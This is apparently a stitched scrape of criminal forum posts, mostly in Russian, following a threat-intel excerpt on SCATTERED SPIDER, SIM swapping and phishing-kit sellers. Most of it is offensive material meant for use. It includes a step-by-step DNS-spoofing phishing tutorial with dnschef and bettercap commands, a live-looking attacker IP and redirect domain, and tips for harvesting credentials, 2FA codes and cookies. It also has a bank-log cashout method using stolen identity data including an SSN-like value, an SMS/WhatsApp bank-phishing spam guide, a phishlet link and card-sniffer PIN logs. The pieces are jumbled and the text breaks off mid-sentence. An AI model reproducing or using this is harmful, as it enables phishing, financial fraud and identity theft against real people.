Кроме того, Stealc сканирует файл %LOCALAPPDATA%\.IdentityService\msal.cache, в котором кэшируются токены Azure Active Directory. Злоумышленники могут использовать эти токены для доступа к облачным ресурсам без прохождения обычных процессов аутентификации.
Технологии подмены SIM-карт, используемые для обхода MFA и доступа к SaaS- приложениям
Злоумышленники используют подмену SIM-карты как метод обхода MFA, что позволяет им получить несанкционированный доступ к критически важным платформам SaaS. При атаках с подменой SIM-карты группа киберпреступников обманывает операторов мобильной связи, чтобы перевести номер телефона жертвы на контролируемую ими SIM-карту. Это позволяет собирать коды MFA, отправленные по SMS, эффективно обходя двухфакторную аутентификацию. Этот метод использовался для атак на учетные записи пользователей на таких платформах, как Okta, ServiceNow и в системах службы поддержки.
Попав внутрь скомпрометированной учетной записи пользователя, SCATTERED SPIDER нацеливается на облачную инфраструктуру, такую как инстансы Microsoft Azure или AWS. В некоторых случаях злоумышленники создают несанкционированные виртуальные машины (ВМ), которые используются затем для обхода систем безопасности жертвы, поскольку эти недавно созданные ВМ часто не имеют необходимых инструментов безопасности или мониторинга, таких как EDR. Это позволяет злоумышленникам избежать обнаружения, украсть данные и перемещаться по сети незамеченными.
Киберпреступная группа использует также такие легитимные облачные инструменты, как Специальная административная консоль Azure (Azure’s Special Administration Console) и Data Factory, для удаленного выполнения команд, передачи данных и удержания в сети, избегая обнаружения.
Аналитики EclecticIQ выявили злоумышленников - поставщиков услуг по подмене SIM-карт, работающих на подпольном рынке с собственным каналом в Telegram под названием HSBC Network. Такие сервисы, управляются обычно подростками из Великобритании, кто активно предлагает свои услуги для обмана жертв.
Рисунок 7 – Реклама услуги по подмене SIM-карт на канале Telegram
Рисунок 8 – Сообщество по подмену SIM-карт в чате Telegram под названием HSBC
Network
Аналитики EclecticIQ с высокой степенью уверенности утверждают, что некоторые участники и продавцы услуг в чате HSBC непосредственно связаны с группой SCATTERED SPIDER. Эта оценка сделана на основе наблюдений за участниками, ранее связанными с деятельностью SCATTERED SPIDER, которые были идентифицированы в чатах HSBC и других известных сообществах по подмене SIM- карт в Telegramе. Аналитики отметили, что злоумышленники часто используют чаты Telegram и Discord для обмена инструментами и методами, тем самым расширяя свои совместные знания и возможности.
Telecom Enemies: группа, предоставляющая услуги разработчикам и способствующая фишингу и кибератакам
Аналитики EclecticIQ выявили группу Developer-as-a-Service (DaaS) под названием Telecom Enemies (также называемую Carrier или Telecom Clowns). Члены группы SCATTERED SPIDER, вероятно, использовали эту группу для разработки инструментов для своей преступной деятельности, таких как Gorilla Call Bot, которые используются для голосовых фишинговых кампаний через службы Google Voice.
Рисунок 9 – Рекламируемый сервис Gorilla callbot на канале Telegram Telecom
Enemies
Рисунок 10 — Gorilla Callbot, управляемый через Telegram-бот
Аналитики EclecticIQ заметили, что Telecom Enemies продают услуги набора для фишинга под названием Suite's (All in one) AIO. Аналитики определили URL-адрес панели администратора инструмента forward-icloud[.]com/admin/dashboard/login, используемый в качестве общей платформы для работы между клиентами, купившими их услуги. Он предназначен для доставки шаблонов фишинга для различных сервисов, таких как Coinbase, Gemini, Kraken, Binance, Robinhood, OKX, Trezor, Ledger, Exodus, MetaMask, Trust Wallet, Bitwarden, LastPass, Yahoo!, AOL, Microsoft/MSN, Gmail и iCloud. Злоумышленники используют панель управления Suite's AIO для управления этими фишинговыми кампаниями и для сбора токенов 2FA.
Рисунок 11 – Панель администратора фишинговой панели
Инструменты и услуги, предлагаемые Telecom Enemies, широко рекламируются на каналах Telegram, включая HSBC Network и Star Chat. Эти каналы активно используются участниками SCATTERED SPIDER, что еще больше расширяет охват и доступность предложений Telecom Enemies в подпольном сообществе. Группа хорошо представлена на подпольных форумах, предлагая услуги сотрудничества и разработки на заказ. Услуги гаранта и посредничества приветствуются для проведения безопасных сделок между злоумышленниками.
Участники Telecom Enemies (@carrier / @TelecomEnemies #TE):
@tempt
Псевдонимы: "tempt," "t0," "bAS1C"
Специализация: эксплуатация веб-приложений и API, реверсинг и проникновение
в сеть. Особенно активен в атаках на операторов AT&T, T-Mobile и Verizon и их
мобильные приложения.
@swordartonline
Псевдонимы: "Lore"
Специализация: эксплуатация веб-приложений и API, веб-сканирование и
тестирование на проникновение в IoT.
@someonesomewheresomething
Псевдонимы: "PIN," "u0"
Специализация: программирование UEFI/прошивок, разработка драйверов Linux/NT
и разработка вредоносного ПО.
@byte_array
Псевдоним: "sp0m"
Специализация : тестирование на проникновение, эксплуатация веб-приложений и
API.
Может ли кто-нибудь помочь мне оставить OBS в качестве основной камеры на мобильном телефоне, когда камера открыта?
Ищу кому полить траф, на крипту лью, профита нет. Может тут хоть будет. Вообще
интересна эта тема, так как никогда не работали по ней. Но знаю, что в этой
нише тоже хорошие бабки можно зарабатывать. Может быть есть здесь умельцы со
своими офферами кому траф нужен?
Еще глупая мысль возможно, но не понимаю почему все ищут приемки от Apple Pay.
Если вы смогли привязать карту с деньгами и вам нужно только совершить оплату.
То не вижу проблем Где можно оплатить… Мне кажется я знаю где. Но это все я
так понимаю упирается в холд? Просто однажды мы карту купленную в шопе за 7$
примерно, ради прикола сами вбили в онлифанс рандомной модели на 3к$ . Но это
онлифанс, там холд неделя. Но я знаю где холд 72 часа… в общем ребятам это
просто мои рассуждения. Я вообще трафом занимаюсь. Но интересно это
направление сейчас. Если у вас есть какие либо предложения, будет интересно
пообщаться.
Автор:dunkel
Для форума:xss.is
Всем привет. Что происходит когда человек открывает сайт? Браузер должен отправить на ip сервера где хостится сайт (или на ip cdn типа cloudflare) GET запрос по протоколу http для получения запрашиваемой страницы сайта чтобы открыть ее в браузере. Где он узнает этот ip адрес?
Пример открытия xss.is:
Устройство ищет по dhcp в локальной сети ближайший(местный) dns
сервер(резолвер) и спрашивает запись A (ipv4) для xss.is (лог из wireshark)
А затем когда получает ip из A записи посылает на него GET запрос с http
заголовком Host: xss.is
И в теле ответа получает код страницы которую надо отрендерить в браузере.
*По этому заголовку сервер или cdn определяет контент для какого сайта отдавать пользователю. Потому что на одном хостинге с одним ip может быть несколько сайтов. Если введете просто айпи сайта в адресную строку скорее всего ничего не получите. Можно таким образом хостить и отдавать жертвам несколько фишингов с одной нашей vps, в зависимости от заголовка
Архитектура dns за редким исключением остается неизменной с 1983 года. Каждый
раз, когда человек хочет открыть сайт, браузер отправляет запрос с указанием
домена на днс сервер, который в ответ отправляет необходимый айпи адрес. И
запрос, и ответ на него передаются в открытом виде, без какого-либо
шифрования. Это значит, что провайдер, админ сети или злоумышленники c mitm
могут не только логгировать историю всех запрошенных сайтов, но и подменять
ответы на эти запросы.
Что будет если жертва введет в браузер например binance.com или просто кликнет
по любой ссылке на любу страницу на этом домене, и получит из локального кэша
или в ответе dns вместо реального ip сайта - ip нашей подконтрольной vps? -
жертва попадет на фишинг.
Фишинг кредов в wifi сети офиса компании частая точка входа в сеть корпу, есть
апт кто таким образом добывает доступы
Фишинг через dns может быть точечным (направленным на одного/нескольких людей
в локальной сети) или массовым фармингом траффика (через свой mitm узел/ iot
ботнет/отравление кэша)
Вместе с кредами, 2fa и куки сессией так же сохраняйте в бд exit node айпи
жертвы, чтобы подобрать прокси по подсети/городу для входа и не иметь проблем
с фродом.
Теперь про сами dns атаки и их мое небольшое определение:
Подготовка фишинга:
Перед тем как спуфать/загрязнять dns надо подготовить фишинг.
После перехода жертвы на наш сервер у нас будет два варианта продолжения
атаки:
Моментально редиректить жертву на наш визуально похожий домен, чтобы
отдавать контент по https и иметь замочек ssl слева от url, так как мы легко
получим ssl/tls сертификат на подконтрольный нам домен. Найти незанятую
доменную зону для слова можно здесь https://lab.xpaw.me/alldomainsearch.html
Но не рекомендую использовать популярные трейдмарки слова вроде binance, так
как браузеры могут быстро автоматически накинуть кт (Красная Табличка,
deceptive site ahead) за фишинг. Лучше используйте похожие символы (например
blnance), panycode + клоакинг чтобы боты не чекали контент
Отдавать фишинг прямо на оригинальном домене, но через http, без ssl
замочка. Так как мы не можем получить приватный ключ от чужого ssl сертификата
и оригинального домена для подписи своих запросов.
Но плюс этого метода в том что не нужен клоакинг, и ваш фишинг никогда не
попадет под бан/красную табличку, потому что его будут видеть только виктим
юзеры, а гугл боты никак не смогут на него попасть, потому что у них будет
открываться оригинальный сайт.
Мне лично нравиться больше первый вариант, с редиректом, т.к юзер увидев
страшную надпись "Не защищено" может что нибудь заподозрить
Для начала я подниму простенький ленд фишинг страницы входа xss.is на Apache
на левой vps. Просто скачаю страницу входа и добавлю надпись "фишинг" чтобы вы
могли отличить, что сейчас мы на фишинге.
В реальных атаках лучше использовать реверс прокси, всякие фреймворки для
фишинга например gophish, evilginx3 или очень качественный клон
Теперь подменим айпи сайта на всех этапах поиска его устройством (из начала статьи), будем двигаться в том же порядке, от локального кэша к dns запросам
1) Браузер сначала проверяет свой локальный кэш
Кэш браузера может отравиться после получения отравленного dns запроса и
остаться таким до его следущего обновления из легитимного dns. Если IP адрес
уже кэширован (то есть недавно использовался), браузер может сразу
использовать его, чтобы ускорить загрузку страницы. Посмотреть какие ip
закешированны для каждого домена в гугл хроме можно введя chrome://net-
internals/#dns ,в firefox about:networking#dns
Кэш браузера (допустим Google Chrome в Windows) храниться в
C:\Users%юзер%\AppData\Local\Google\Chrome\User Data\Default\Cache в каком то
бинарном формате. Изменить этот кеш можно в любом hex редакторе открыв самый
тяжелый файл в этой директории и поискав через ctrl + f (для этого не нужны
админ права в отличии от редактирования hosts)
Также ip сайта можно указывать в burp suite, это будет тоже самое что кэш
браузера (хотя работает скорее как системный резолвер) и проще для наших
тестов. Открываем настройки settings, пишем в поисковой строке dns и добавляем
запись с доменом xss.is и айпи нашей vps (185.104.248.247) на которой поднят
фишинг
Отключаем "безопасный dns сервер" если включено в настройках браузера (иначе
может не сработать)
Вводим в адресную строку xss.is, и у нас на легитимном домене открывается
фишинг который мы подняли на vps
Правда без ssl/tls замочка (слева от url будет палевная надпись "не
защищено"). Поэтому лучше редиректить на наш домен, типа xss.ls или xxs.is
2) Файл hosts
Указывает на хосты (ip) для конкретных доменов в формате "ip host", являясь
конфигом для системного резолвера. Для редактирования требует админ прав
C:\Windows\System32\drivers\etc\hosts
Часто используется чтобы заблокировать домены телеметрии и проверки лицензий
софта всякими установщиками кряков, указав 0.0.0.0 domain.com
Раньше часто модифицировался Adware для показа рекламы. Я его трогать не буду
так как для его изменения нужен доступ к устройству, а это не относится к
сетевым атакам с dns.
Тут кстати ситуация непонятная, потому что иногда некоторые браузеры работают
по правилам hosts только при недоступности dns сервера. То есть
1)сначала проверяют кэш браузера
2) затем отправляют dns запрос
3)и если ответа от резолвера нет - только потом используют айпи из hosts.
3) Если на устройстве его нет или ttl истек, то делает запрос по DNS
протоколу к ближайшему DNS серверу
Предположим жертва давно не заходила на сайт, и срок годности ее кэш записи
истек. Тогда браузер/устройство посылает dns запрос на ближайший dns сервер
чтобы узнать айпи домена xss.is.
А ближайший это какой? По умолчанию, если вы не используете vpn, ближайшим
обычно считается тот который автоматически высылает провайдер при настройке
PPPoE соединения в роутере. Посмотреть их можно зайдя в админку роутера в
настройки сети или pppoe (их два, часто один в локальной сети NAT, другой
запасной). Роутер отдает эти dns сервера по DHCP всем устройствам или сам
перенаправляет на них dns запросы работая как dns relay.
Еще dns можно вручную указать в настройках сети в винде, здесь кстати
некоторые вредоносы изменяют их на свой, например в 2007 году группа
"предприимчивых" кодеров из Эстонии написали троян dnschanger, который за
несколько лет заразил 4 млн машин по всему миру. Троян изменял системные
настройки днс, что приводило к появлению рекламы на веб страницах (просто
реклама, даже не фишинг). Это принесло создателям $14 млн (по 4$ с машины) +
тюремный срок. Причем по решению суда пришлось в течение 7 месяцев
поддерживать временные dns сервера по тем адресам, где располагались сервера
мошенников. Если бы они это не сделали, то пользователи зараженных устройств
одномоментно лишились бы доступа в сеть.
Но по умолчанию в режиме "автоматически" винда получает dns от роутера
Изменение DNS в роутере:
Если у нас есть доступ к роутеру (например через IoT ботнет) мы можем изменить
в нем dns по умолчанию на свои. Так делали роутерные ботнеты Ttint и GhostDNS
А на какой сервер нам менять? Давайте поднимем свой dns сервер на той же vps с
помощью dnschef.
Открываем ssh с vps:
Bash:Copy to clipboard
sudo apt install python3-pip
sudo pip3 install dnschef
git clone https://github.com/iphelix/dnschef.git
cd dnschef
sudo python3 setup.py install
Если не указаны какие-либо параметры, DNSChef будет работать в режиме прокси. Это означает, что все запросы будут просто перенаправлены вышестоящему DNS серверу (по умолчанию 8.8.8.8) и ответы от него будут возвращены обратно запрашивающему хосту.
Перед перехватом я изменю конфиг Apache сервера чтобы он редиректил на
тестовый фишинг домен (чтобы был замочек ssl). Добавляем в конфиг строку
Redirect / https://xssis.ddns.net
Запускаем dnschef указывая, что нужно возвращать 185.104.248.247 для A (ipv4)
записи домена xss.is и слушать внешний интерфейс.
python3 dnschef.py --fakeip 185.104.248.247 --fakedomains xss.is --interface
185.104.248.247
Указываем айпи нашего dns сервера в настройках роутера как DNS1 (DNS2 можно
оставить пустым)
И пробуем зайти на xss.is с любого подключенного устройства. Среди запросов к другим доменам видим что запрос с xss.is перехвачен и отправлен ответ с нашим айпи на котором же у нас веб сервер
А затем жертву редиректит на фишинг доменRedirect / https://xssis.ddns.net
Похожим образом (только взламывая не роутеры, а модемы) в Бразилии в 2011-2012 годах было взломано 4,5 млн DSL модемов. Для этого было достаточно разослать спам со ссылкой на вредоносную страницу, которая взламывала модем и прописывала новый адрес днс сервера. Причем в этот раз мошенники не стали мелочиться с рекламой. На своих подставных днс серверах они подменяли адреса для всех крупнейших банков Бразилии <https://securelist.com/web-based-attack- targeting-home-routers-the-brazilian-way/66358/>
MITM/Перехват DNS запросов (DNS hijacking):
Сам по себе протокол dns не имеет никакого шифрования, все DNS запросы и
ответы передаются в открытом виде, что означает, что любые промежуточные узлы
могут перехватывать и просматривать, какие домены юзер запрашивает, и
модифицировать ответы.
Многие (даже известные) интернет провайдеры и правительственные организации
тоже могут перехватывать днс запросы своих юзеров. Провайдеры делают это для
сбора статистики и для показа пользователям рекламы(так щас делают только
всякие нищие индуские и азиатские провайдеры). Например, если пользователь
пытается зайти на несуществующий сайт, провайдер вместо сообщения об ошибке,
может перенаправить его на свою веб-страницу с рекламой. Правительственные
организации (в Китае например) могут использовать перехват днс запросов для
цензуры и для "безопасного перенаправления" пользователей на "рекомендуемые"
правительством домены или вебстраницы. Американский провайдер Earthlink в 2006
году стал перенаправлять пользователей и информацию об их запросах рекламному
партнеру barefruit. Особенно плохо это выглядело в том случае, если
пользователь запрашивал несуществующий домен известного сайта, например,
webmale.google.com. Пользователь видел рекламу и контент, которые не имели
ничего общего с google.com в адресной строке. Подобная практика явно нарушает
стандарт rfc для dns ответов и делает пользователей уязвимыми даже для xss
атак, которые работают на поддомене для домена.
В рф пример - провайдер (когда кончились деньги или "сайт заблокирован на
территории по решению кого то там блаблабла бубубубу...) или даже роутер
(когда нет WAN выхода в интернет, или родительский контроль, или когда вайфай
где то в заведении и требуется ввести данные кастомера...) могут перехватить
запросы к dns серверам. Мы хотим так же, только допустим редиректить на наш
фишинг.
Против mitm перехвата dns запросов есть несколько защит:
- DNS over HTTPS (DoH, самый популярный, используется браузерами при dns
запросах к серверам которые его поддерживают, например google 8.8.8.8 и
cloudflare 1.1.1.1. Наше счастье что большинство местных dns от провайдера
досихпор работают без doh (а то так сложнее будет следить будет за юзерами))
- DNS over TLS (DoT, юзают некоторые программы)
- DNSCrypt (редко встречается, знаю что использует Яндекс Браузер)
- Любой VPN тоннель.
DNS спуфинг через ARP спуфинг:
Если у нас нет доступа к настройкам dns в админке роутера, но мы находимся в
одной локальной/wifi сети? В таком случаем мы можем выдать себя за
маршрутизатор в сети, и проксировать/изменять dns запросы. Существует большое
количество способов попасть в локальную сеть или взломать чужой wifi (например
через routerscan, wifite, уязвимости конкретных моделей и прошивок, перехват и
брут пароля из хендшейка).
Конкретно под спуфинг dns через arp существует несколько готовых инструментов,
например https://github.com/0x0be/mitm написан на python. Она сразу и arp
спуфает, и dns подменяет.
Устанавливаете утилиту, подключаетесь к wifi, запускаете, указываете интерфейс
и айпи жертвы в сети.
Правда умолчанию все dns запросы жертвы будут редиректиться на твой локальный
айпи, на котором у тебя должен быть веб сервер или реверс прокси. Но можно в
коде легко подправить, чтобы спуфались только запросы для конкретного домена
(содержали допустим строку xss.is) и указывали на другой ip, не атакующего, а
vps.
Перехват dns запросов через nat/vpn ноду:
А если у мы не рядом с wifi, но у нас есть удаленный доступ промежуточному к
узлу (например к коммутатору через сетевой бекдор) в цепочке узлов (hop'ов)
через которую жертва выходит в интернет? Или мы сами являемся узлом (например
у нас свой "бесплатный впн сервис"). Тогда если траффик проходит через нас, мы
можем запустить dns спуфинг, например через старенькую софтину ettercap
Или его современный и более функциональный аналог bettercap
https://www.bettercap.org/ (написан на go)
Я буду использовать его. Поддерживает все типы сетей, все протоколы, куча
модулей и аддонов на гитхабе, авто, фото, вело, мото, ебля гребля и охота.
Проект вроде якобы кроссплатформенный, но на линукс его гораздо легче
установить, т.к на винде могут быть проблемы с зависимостями
Сначала устанавливаем go https://go.dev/doc/install
Затем go install github.com/bettercap/bettercap@latest
Пробуем запустить, и если все нормально установилось вы увидите консоль с
программой. У bettercap есть веб интерфейс https://github.com/bettercap/ui
,но это для сойджаков.
Пишем help и нам выводит список запущенных модулей
По умолчанию сниффает траффик на eth0, мы можем установить свой интерфейс
командой bettercap -I tun0
, это может быть любой прокси/vpn/узел в виде
интерфейса с которого уходит/приходит траффик.
У меня просто траффик с windows 10 виртуалки проксируется через виртуалку
kali.
Перед запуском модуля dns.spoof нам нужно установить домен для которого будут
перехватываться dns запросы из огромного потока траффика, допустим xss.is
Пишем set dns.spoof.domains xss.is
Далее устанавливаем айпи который будет возвращаться для A записи этого домена
(наша vps с фишингом)
set dns.spoof.address 185.104.248.247
Запускаем dns.spoof on
Пробуем на виртуалке с виндой в браузере открыть сайт xss.is
Видим в логах что dns запрос перехвачен и bettercap сам резолвит наш фейк
айпи, откуда как мы помним нас редиректит на фишинг с ssl замочком
https://xssis.ddns.net
Но mitm перехват не сработает, если жертва использует dns не от местного
провайдера, а в браузере от гугла или cf, так как они поддерживают dns over
https, и браузер использует doh при работе с ними, а снифферы просто не увидят
dns траффик
Отравление кэша легитимного dns сервера
Это сложная атака, которая после удачного исполнения позволит массово получать
качественный траффик на фишинг/дрейнер из целого региона провайдера и
конвертировать его в $.
Во 2 части, to be continued...
кто имел дело с открытием колл центра? связь, безопасность, сипки и т д.. кто
обладает полной информацией от а до я? буду благодарен за информацию. готов
отблагодарить за информацию $
Масштабы: от 1000 операторов.
Альтернативный вопрос размещён и в разделе связанном с Банкингом, но хотелось бы узнать все плюшки, которые даёт терминал а также возможную стоимость такой приблуды, т.к очень заинтригован
Я написал этот PHISHLET несколько месяцев назад. Он либо будет работать напрямую, либо потребует небольшой модификации, но я надеюсь, что он будет кому-то полезен.
https://send.exploit.in/download/4e8a6249d8379229/#cdY1RhcztiAULH-XLVHNZw
как такое обойти ?
Hello fam..
i want to share one of my three video full spamming inboxer setup for
spammer's that want to learn more or having issue with inboxer spam filter-
bot.
This video work for office365 inbox, yahoo, aol. You can use this spamming method spam CC | BANKS LOGS | OFFICE 365 | Webmail..
Download video here mega-Link:
Free Inboxer video tut for xss memeber
's
I will post a video tut, how to use meta business WhatsApp bot for SMS spamming messages for this listed services ( banks | crypt wallet | apple pay | cash app | yahoo Logs | Netflix | canada interac e-transfer ). is most faster delivery inbox results, attacker's use this methodology to manipulate many companies customers that has WhatsApp meta business account Listed above..$
Stay safe and update your system again phishing attack's
Happy hacking & phishing @xss.is member's Stay safe buddies
Всем привет, решил заняться нфт скамом, подскажите книги/мануалы чтобы я лучше мог взаимодействовать/манипулировать людьми и заманивать их на ленд
Всегда интересно было, как говорил один великий человек люди это всего лишь
инструмент оружия для достижения каких то целей, интересно узнать как эту
фразу использовать в реальной жизни дайте совет или что больше подробнее об
этом.
Заранее спасибо.
hello i haven't spammed in a few months. My previous method was using a gateway from codecanyon and connecting a burner android with t-mobile sims to send out spam messages. It seems like sim spamming is dead now at least in US, looking for tips on a new gateway and api's that don't block/ban spam messages. Any tips or direction would be greatly appreciated. Will also share some logs to anyone who can give me a proper method. Thanks.
Cижу мелочь вытаскиваю.
Может какие варианты накидает кто-нибудь, нормальные
Так же готов посотрудничать, если есть готовые связки, мб вы точно знаете куда, но по какой-либо причине нету возможности - я готов с такими людьми повзаимодействовать.
А вообще может найдутся хорошие люди, кто просто отпишет куда можно потыкать (заранее спасибо)
Это не реклама, реально месяц сижу тыкаю, пробиваю всё, нигде не фродит, аппаратка топ у меня если что =)
Может кто-то сталкивался с таким вопросом и поделится своим опытом, к чему пришёл.
Это не реклама, уважаемая модерация, я понимаю как это выглядит, но у меня реально вопрос/сложность с который я столкнулся.
Продажей мата не занимаюсь
CARD.COM/ VENNMO To BANK LOG CASHOUT
Start
by obtaining a bank log that provides login access.
Avoid using major banks like Chase, Wells Fargo, BOA, or 53rd, as they may
require additional verification steps.
Opt for local banks such as TD Bank, SunTrust, Fidelity, or any local bank
credit unions for a smoother process.
<<-------->>
Bank
Transfers to sidestep chargebacks and delays:
ACH transfers typically take 3-5 business days to process. During this time,
chargebacks may happen, or certain aspects of the transfer could trigger
alerts, requiring your driver's ID or passport, which you might not have. This
is what we call a delay.
All of this hassle can waste your time and energy, leaving you to rely on luck.
This approach leads to chargebacks occurring after you've already spent your funds. Delays depend on how cautious and savvy you are.
This method involves a third party for cashing out instead of a direct transfer, and the transfer can be completed within two days.
Bank
logs are formatted as follows:
Name:
Scarletta Scarletta
Account:
9476XXX8756
Routing:
198733XXX00101
Bank
Name: Local Credit Union
SSN:
451-24-3653
DOB:
53/89/1960
Billing
Address: Indianapolis, Indiana (IN), 46204
Additional details may include state, city, email, and password, but most importantly, if your source has cookies, make sure to get those too.
1. Visit card.com to obtain a prepaid card linked to a checking account using the bank logs. It will take 3-5 days to activate the card, but you can deposit funds once registration is successful. As long as you don’t make any changes to the account, the owner won’t be alerted.
2. Go to Venmo and create an account using the prepaid account details. Verify your Venmo account with the SSN, DOB, and other necessary information.
3. After a day, link the prepaid account to your Venmo account and verify it. Input the bank log details into your Venmo account and complete the verification. Two days will pass.
4. On the third day, load less than $11,000 into your Venmo balance. The following day, cash out less than $10,000 into your prepaid account. The money is yours to use.
5. The card should arrive at your drop location. Activate it online and cash out right away.
Warning. ⚠
1. Prepaid cards can only handle amounts of $10,000 or less. Any amount over
$10,000 will be returned to your Venmo balance.
2. Transfer funds the day after you load them.
3. It's important to ensure that the name, social security number, date of birth, and Your sock IP must match consistent across your prepaid account, Venmo account, and bank records.
4. Be smart don't withdraw all the money from your Venmo balance at once, buddy to avoid security trigger.
<----END---->
Now Let 's us working on how to Spam Bank logs and Methods hacker/spammer use:
Noted: You Need Your brain and basic understanding about social engineering skills as spammer:
<<<+++++>>>>
How Hacker's & Spammer's use various techniques to spam bank users, typically
aiming to steal sensitive information such as account numbers, passwords, or
personal identification details. Here are some common methods they employ:
1. Phishing Emails
Description: Hackers send emails that appear to come from a legitimate bank.
These emails often contain urgent messages, like a security alert or a request
to verify account details.
Tactics: The email may include a link to a fake website that looks like the
bank’s official site. When users enter their login credentials, hackers
capture this information.
2. Smishing (SMS Phishing)
Description: Similar to phishing emails, but the fraudulent messages are sent
via SMS.
Tactics: Messages often include a link to a spoofed bank website or a phone
number to call, where an automated system or scammer will ask for personal
information.
3. Vishing (Voice Phishing)
Description: Hackers call victims pretending to be bank representatives.
Tactics: They might use caller ID spoofing to make the call appear legitimate
and then ask for sensitive information under the guise of verifying the user’s
identity or account.
4. Malware
Description: Malicious software is designed to infect a user’s computer or
mobile device.
Tactics: Malware can be distributed through email attachments, malicious
links, or infected apps. Once installed, it can log keystrokes, steal stored
credentials, or redirect users to fake banking sites.
5. Social Engineering
Description: Manipulating individuals into divulging confidential information.
Tactics: Hackers may use psychological tricks, such as creating a sense of
urgency or posing as a trusted figure, to convince users to share sensitive
data.
6. Clone Websites
Description: Creating a replica of a bank’s website.
Tactics: Hackers might send links to these clone sites via email, SMS, or
social media, tricking users into entering their login details.
7. Spoofing
Description: Faking an email address, phone number, or website URL to appear
as a legitimate source.
Tactics: By spoofing the bank’s official contact details, hackers can make
their communications seem more credible and trustworthy.
8. Data Breaches
Description: Attacking a bank or a third-party service provider to steal user
data.
Tactics: Hackers may use the stolen data to directly access accounts or to
craft more convincing phishing or social engineering attacks.
9. Credential Stuffing
Description: Using stolen username and password combinations from other
breaches to access bank accounts.
Tactics: Automated tools are used to test these credentials across multiple
sites, exploiting users who reuse passwords.
<<++++++>>
SmS Whapi Spamming Tools Needed For Bank/CC Will Listed Below:
Scam-
Pages script Of Banks
Whapi
SMS Bulk Sender Script
Whapi
API Token
Phone
Number Mobile Carreir Leads
Whapi
Script Mobile Number Validator script
Phone
Number Carreir Validator script
Phone
Number generator script
RDP
8GB, 4 CPU
Whapi
Business Account
Spam-
Words Checker
Texts
Messages AI Generator
Bulletproof
Host Panel
Domain
We will use Listed Methods Below :
2. Smishing (SMS Phishing):
SMS spamming has become a prevalent method for targeting banking, credit card,
and PayPal accounts. Consequently, we will utilize WhatsApp for sending SMS
text messages through social engineering techniques. It is perplexing that
many beginners fail to think critically and resort to outdated methods and
common tricks, ultimately wasting both time and money, only to lament the lack
of results from their spamming efforts.
Regarding the use of WhatsApp SMS: WhatsApp has emerged as a preferred platform for numerous companies, including cryptocurrency exchanges like Binance, which employ it for customer OTP SMS verification. Additionally, Yahoo and other organizations have adopted WhatsApp for similar purposes. The increasing challenges faced by SMS telecom ISPs have made it increasingly difficult for individuals to reach their spam targets, often resulting in blocks due to the age of domains and the presence of spam-related keywords, particularly those associated with banking. Filters implemented by ISPs and SMS service providers can further hinder spam messages. In contrast, utilizing WhatsApp can alleviate these challenges, provided one applies thoughtful strategies in their setup and messaging approach.
5. Social Engineering:
It is essential to understand the importance of social engineering. Consider
this scenario: if someone sends you foolish messages, would you easily fall
for them? We must evaluate how susceptible we are to manipulation before we
can achieve our desired outcomes. Using common sense is crucial - never
disclose your bank passwords, even if you receive messages claiming that your
account will be locked unless you provide information. Such tactics are
outdated and nonsensical. Would you or I believe such foolish messages?
To effectively engage in social engineering, it is necessary to research the current affairs of the state or country you are targeting. There are numerous resources and government benefits in the United States that can be exploited. By crafting persuasive SMS messages, you can increase the likelihood of individuals falling for your scams. I have even created a ["Video Of Whapi Sender Script"](https://crax.tube/watch/method-sms-sp-mming-bypass-isp-block- link-issue-and-api-sms-issue_PEZE9wRIyfZN8zR.html) demonstrating how I established a business WhatsApp account on a SIM-less Android phone for my strategic endeavors. This phone contains no personal information, only serving as a platform for cybersecurity testing. I developed a basic Python script for sending bulk WhatsApp messages to achieve my objectives, and it proved to be successful. Take a look at how I utilized a free AI spam reputation checker to filter out spam words in my messages.
6. Clone Websites:
Sure, we require an updated scam-page script to ensure that our victims
believe our fake website is a legitimate page for logging into a real bank
website.
We definitely need an updated scam-page script to make our victims trust our fake website as if it were a legitimate page for logging into a real bank website.
8. Data Breaches:
Sure, we require information such as phone numbers. Obtain phone leads from a hacked database through SQL injection or utilize an updated Python phone number generator. Remember to strategically use keywords for the target state of large banks' user branches in order to generate phone leads. Google dork search engine is a valuable tool for hackers and spammers to gather information online.
Once you have gathered a significant amount of phone numbers, look for a script or online service that validates mobile number carriers to filter out landline numbers.
We are interested in mobile numbers only. Once we have identified our mobile number leads, we move on to validating which ones are registered with WhatsApp using a WhatsApp phone number validator, such as a WhatsApp API script checker.
After completing these steps, make sure to save the information in a secure location.
Load your SMS WhatsApp script with your numbers.txt file and the messages you have prepared in your message.txt file. Then, open the command prompt or terminal in your file directory to execute the spamming process and deliver messages to your targets.
If you need guidance on setting up a host, creating a panel, uploading a page, etc., refer to my previous threads where I have shared detailed tutorials on these topics.
https://xss.is/threads/117676/
<<<++++++++>>>
Protection Tips:
Be Skeptical of Unsolicited Communications: Verify the authenticity of emails,
texts, or calls by contacting the bank directly through official channels.
Use Multi-Factor Authentication: This adds an extra layer of security to your accounts.
Regularly Monitor Accounts: Keep an eye on account statements and report any suspicious activity immediately.
Educate Yourself: Stay informed about common phishing and fraud tactics.
Keep Software Updated: Ensure your devices are protected with the latest security updates and antivirus software.
Staying vigilant and cautious can significantly reduce the risk of falling victim to these types of attacks.
<<<----------------------------->>>
A big thank you to the xss.is family and security teams. Wishing you all
successful hunting with big
bags
По теме работают всего пару человека с форума verified. Не думаю что появится как грибы после моей статьи сервисы изготовления дроп-проектов. Хотя что может быть проще, брать крупные бабки и делегировать работу фрилансерам. Для начала нам потребуется акк на verified, 50 баксов стоит, потом нада будет оплатить звание вендора (разово) - баксов 100, оплатить рекламу в разделе нужном - 75 баксов в месяц, далее надо будет депозит, думаю запросят 1-3к баксов на несколько месяцев (вроде 2-3 после которых можно будет забрать депозит назад), далее идём в раздел где рекламируются мальчики дропроектчики их там всего трое
Такой лог увидел у бота если не ошибаюсь, может и не бот, но сниффер точно, чекает кредитки, пин посылает и тп
Hidden content for members of the Пользователь, Администратор, Модераторы, Легенда, Premium, Кидала, Эксперт, Забанен groups.
Code:Copy to clipboard
📍2024-06-12 11:20:38.182749+03:00
📟Получен PIN:1827
Spoiler: СКРИН
может есть умельцы которые могут это за дешево оплатить ? Интересно ваше мнение
Специалисты компании F.A.C.C.T. обнаружили новую мошенническую схему, направленную на сотрудников криптобирж и криптоэнтузиастов с использованием доменов ENS (системы доменных имен, построенной на блокчейне Ethereum).
С 13 июня Московская биржа приостановила торги долларом и евро, а также
инструментами с расчетами в этих валютах. Это событие может привлечь
инвесторов на рынок криптовалют, чем в том числе могут воспользоваться
злоумышленники.
Все начинается с того, что злоумышленники устанавливают бизнес-контакт, обещая
жертве прибыльные инвестиции в различные проекты. Фактически этот этап
